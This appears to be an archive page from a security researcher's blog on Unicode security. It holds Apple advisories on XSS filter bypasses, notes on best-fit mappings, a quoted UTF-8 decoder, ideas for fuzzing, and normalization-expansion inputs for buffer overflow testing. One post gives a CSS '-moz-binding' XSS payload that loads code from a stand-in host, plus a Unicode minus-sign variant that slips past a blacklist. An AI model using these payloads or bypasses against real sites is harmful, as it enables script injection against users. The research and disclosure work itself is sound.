Skip to content

Advisory: Webkit – Visiting a maliciously crafted website may lead to a cross-site scripting attack

More from: http://support.apple.com/kb/HT3613

CVE-ID: CVE-2006-2783

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista

Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack

Description: WebKit ignores Unicode byte order mark sequences when parsing web pages. Certain websites and web content filters attempt to sanitize input by blocking specific HTML tags. This approach to filtering may be bypassed and lead to cross-site scripting when encountering maliciously-crafted HTML tags containing byte order mark sequences. This update addresses the issue through improved handling of byte order mark sequences. Credit to Chris Weber of Casaba Security, LLC for reporting this issue.

Tagged

Advisory: International Components for Unicode – Maliciously crafted content may bypass website filters and result in cross-site scripting

Update from: http://support.apple.com/kb/HT3613

CVE-ID: CVE-2009-0153

Available for: Windows XP or Vista

Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting

Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. For Mac OS X v10.5 systems, this issue is addressed in Mac OS X v10.5.7. Credit to Chris Weber of Casaba Security for reporting this issue.

Tagged

Major applications fail to include full Unicode support

As I’ve found with most of the major Web-apps out there, including social media giants like Facebook and others, Unicode support is far from complete. I’m not a big MySQL guy, but have been building some stuff lately and ran into this:

http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16

Basicall MySQL version < 6.0.4 doesn’t support characters outside the BMP (Basic Multilingual Plane) which seems to be a common pattern for a lot of software. The BMP is all code points 0×0000 to 0xFFFF, however, Unicode stretches far beyond to 0×10FFFF. It makes sense I suppose, after all the BMP is made of the most commonly used scripts, the stuff beyond it (supplementary) are usually considered rare.

Tagged

Advisory: International Components for Unicode CVE-2009-0153

Big ones from Apple today: http://support.apple.com/kb/HT3549

CVE-ID: CVE-2009-0153

Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6

Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting

Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.

Tagged

Unicode security attacks and test cases – Best-fit mappings and String transformations

Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood.  On the defensive side, if you can only remember two things:

  1. Converting to Unicode is safe.
  2. Converting between legacy character sets is dangerous.

Ah forget it, unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.

The term best-fit mapping describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.  

I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They just implemented a new profile editor complete with user-ccontrolled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

So they implemented some sort of blacklist because well that’s common. Anyway, somewhere in the callstack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter, and come out transformed into the character I needed. The input:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.

The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?

Tagged , ,

Ultrafast UTF-8 decoder by Bjoern Hoehrmann

I believe this is still getting tested by several parties, but it’s obviously a highly optimized implementation of a UTF-8 decoder. Bjoern Hoehrmann released his Flexible and Economical UTF-8 Decoder recently, check it out:


// Copyright (c) 2008-2009 Bjoern Hoehrmann
// See http://bjoern.hoehrmann.de/utf-8/decoder/dfa/ for details.

#define UTF8_ACCEPT 0
#define UTF8_REJECT 1

static const uint8_t utf8d[] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 00..1f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 20..3f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 40..5f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 60..7f
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, // 80..9f
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, // a0..bf
8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, // c0..df
0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, // e0..ef
0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, // f0..ff
0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, // s0..s0
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, // s1..s2
1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, // s3..s4
1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, // s5..s6
1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, // s7..s8
};

uint32_t inline
decode(uint32_t* state, uint32_t* codep, uint32_t byte) {
uint32_t type = utf8d[byte];

*codep = (*state != UTF8_ACCEPT) ?
(byte & 0x3fu) | (*codep << 6) :
(0xff >> type) & (byte);

*state = utf8d[256 + *state*16 + type];
return *state;
}

Tagged

Unicode security attacks and test cases – fuzzing with Unicode

When it comes to fuzzing parsers, protocols, and other software, I want the fuzzer to be capable of producing tests specific to Unicode. Here’s what it should do at a minimum:

  • Generate half a surrogate pair in UTF-8 or UTF-16
  • Generate illformed byte sequences for UTF-8 and UTF-16
  • Generate overlong UTF-8
  • Generate unassigned and reserved code points
  • Generate codepoints outside of the valid range
  • Generate interesting control characters and characters with special meaning like the BOM, embedding, overrides, etc.

I’ve got some code that does most of these things. Maybe I should elaborate on them some more… Does Peach or another fuzzing framework provide this already?

Tagged , ,

Unicode security attacks and test cases – Normalization expansion for buffer overflows

Normalization, like casing operations, can cause changes to the number of characters and bytes in a string. In testing software, I want to know how to get the most bang for my buck – in other words, what’s the minimal input I can provide to cause the maximum character and byte exansion?

First step:  Figure out what normalization operation your input is going through – NFC, NFD, NFCD, or NFKD.

Next step: Find the right input.

For example, if I pass in a character like U+2177 SMALL ROMAN NUMERAL EIGHT (ⅷ), I’ve passed in a single ‘character’ that takes three bytes [E2, 85, B7] to encode in UTF-8. If that character passes through a decomposed normalization form like NFKC or NFKD, then it has a compatibility mapping from one code point to four: U+0076 U+0069 U+0069 U+0069. Now those are all ASCII characters, so bytewise I didn’t really expand all that much, just one byte, but three extra characters.

Well there may be better cases than this one, just take a look at the maximum expansion factor table, courtesy of the Unicode Normalization FAQ:

Form UTF Factor Sample
NFC 8 3X 𝅘𝅥𝅮 U+1D160
16,32 3X
U+FB2C
NFD 8 3X ΐ U+0390
16,32 4X U+1F82
NFKC/ NFKD 8 11X
U+FDFA
16,32 18X
Tagged , ,

Advisory: Lenovo/IBM ActiveX buffer overflow

CERT released the advisory for this, which I believe is not being fixed by Lenovo/IBM.

http://www.kb.cert.org/vuls/id/340420

This ActiveX control comes preinstalled on many Lenovo systems, and is also downloaded from the main page of their support site. It’s a nasty stack-based buffer overflow, and enterprises and other consumers should consider how to workaround this.

Tagged

Exploiting Unicode-enabled Software slides from CanSecWest and SOURCE

I’m putting my slides online from recent talks at CanSecWest and SOURCE Boston. I have some plans to get a micro-attack-database of useful Unicode characters online soon. The idea is to compress the massive Unicode database into just the characters we’re interested in as testers – ones that can manipulate casing operations, normalization routines, best-fits and other categories to produce useful inputs for fuzzing, web-testing, and visual effects.


slide-1


slide-3

Tagged